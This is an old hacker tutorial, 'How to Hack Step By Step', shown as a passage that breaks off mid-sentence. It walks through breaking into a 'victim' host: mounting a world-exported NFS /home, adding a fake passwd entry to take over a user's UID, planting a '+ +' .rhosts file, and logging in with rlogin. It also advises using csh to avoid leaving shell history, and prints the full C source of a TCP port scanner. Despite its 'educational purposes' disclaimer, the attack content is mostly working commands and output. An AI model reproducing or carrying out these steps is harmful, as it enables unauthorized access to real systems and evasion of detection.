How to Hack Step By Step

howdi folks... I guess you areall wondering who's this guy (me) that's trying to show you abit of everything... ? Well, I ain't telling you anything of that... Copyright, and other stuff like this (below). Copyright and stuff... If you feel offended by this subject (hacking) or you think that you could do better, don't read the below information... This file is for educational purposes ONLY...;) I ain't responsible for any damages you made after reading this...(I'm very serious...) So this can be copied, but not modified (send me the changes, and if they are good, I'll include them ). Don't read it, 'cuz it might be illegal. I warned you... If you would like to continue, press . Intro: Hacking step by step. _________________________________________________________________________________ Well, this ain't exactely for begginers, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step 1: Getting access to site. Step 2: Hacking r00t. Step 3: Covering your traces. Step 4: Keeping that account. Ok. In the next pages we'll see exactely what I ment. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site. I'll try to explain the most used ones. The first thing I do is see if the system has an export list: mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one,then it's time to search another way in. What I was trying to do was to exploit an old security problem by most SUN OS's that could allow an remote attacker to add a .rhoststo a users home directory... (That was possible if the site had mounted their home directory. Let's see what happens... mysite:~>/usr/sbin/showmount -e victim1.site.com /usr   victim2.site.com /home (everyone) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x    8 root      root          1024 Jul   4 20:34 ./ 1 drwxr-xr-x   19 root      root          1024 Oct   8 13:42 ../ 1 drwxr-xr-x    3 at1       users         1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x    8 ftp       wheel         1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x    3 john      100           1024 Jul   613:42 john/ 1 drwxrx-r-x    3 139       100           1024 Sep 15 12:24 paul/ 1 -rw-------    1 root      root            242 Mar   9   1997 sudoers 1 drwx------    3 test      100           1024 Oct   821:05 test/ 1 drwx------   15 102       100           1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper'shome. mysite:~>id uid=0 euid=0 mysite:~>whoami root mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd We use /bin/csh 'cuz bash leaves a(Damn!) .bash_history   and you might forget it on the remote server... mysite:~>su - rapper Welcome to rapper's user. mysite:~>ls -lsa /tmp/mount/ total 9 1 drwxrwxr-x    8 root      root          1024 Jul   4 20:34 ./ 1 drwxr-xr-x   19 root      root          1024 Oct   8 13:42 ../ 1 drwxr-xr-x    3 at1       users         1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x    8 ftp       wheel         1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x    3 john      100           1024 Jul   613:42 john/ 1 drwxrx-r-x    3 139       100           1024 Sep 15 12:24 paul/ 1 -rw-------    1 root      root           242 Mar   9   1997 sudoers 1 drwx------    3 test      100           1024 Oct   821:05 test/ 1 drwx------   15 rapper    daemon        1024 Oct 20 18:57 rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts mysite:~>cd / mysite:~>rlogin victim1.site.com Welcome to Victim.Site.Com. SunOs ver....(crap). victim1:~$ This is the first method... Another method could be to see ifthe site has an open 80 port. That would mean that the site has a web page. (And that's very bad, 'cuz it usually it's vulnerable). Below I include the source of a scanner that helped me when NMAP wasn't written. (Go get it at http://www.dhp.com/~fyodor . Good job, Fyodor). NMAP is a scanner that does evenstealth scanning, so lots of systems won't record it. /* -*-C-*- tcpprobe.c */ /* tcpprobe - report on which tcpports accept connections */ /* IO ERROR, error@axs.net , Sep 15, 1995 */ #include #include #include #include #include #include int main(int argc, char **argv) { int probeport = 0; struct hostent *host; int err, i, net; struct sockaddr_in sa; if (argc != 2) { printf("Usage: %s hostname\n", argv[0]); exit(1); } for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa); sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) { perror("\nsocket"); exit(2); } err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) { printf("%s %-5d %s\r", argv[1], i, strerror(errno)); fflush(stdout); } else { printf("%s %-5d accepted.                                \n", argv[1], i); if (shutdown(net, 2) < 0) { perror("\nshutdown"); exit(2); } } close(net); } printf("                                                                  \r"); fflush(stdout); return (0); } Well, now be very carefull with the below exploits, because they usually get logged. Besides,